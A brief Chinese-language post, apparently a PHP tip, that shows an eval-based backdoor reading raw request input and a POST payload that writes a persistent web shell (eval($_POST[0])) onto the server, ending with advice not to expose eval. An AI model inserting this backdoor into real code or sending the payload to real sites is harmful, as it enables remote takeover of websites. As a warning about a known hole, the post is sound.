很多伙伴想在程序想留一手。
下面这个是普通的例子,也是黑客经常扫描的洞洞。
只要网站可访问文件中存eval函数就会很危险。
例如只要一句代码:eval('?>' . file_get_contents('php://input'));
黑客就可以利用该接口post
$str=" <?php file_put_contents('asd.php', '<?php echo "fuck";eval($_POST[0]);?>');?>";
就可以在你的网站植入生成一个入口文件。
好了,eval函数可不要暴露在访问层就行了。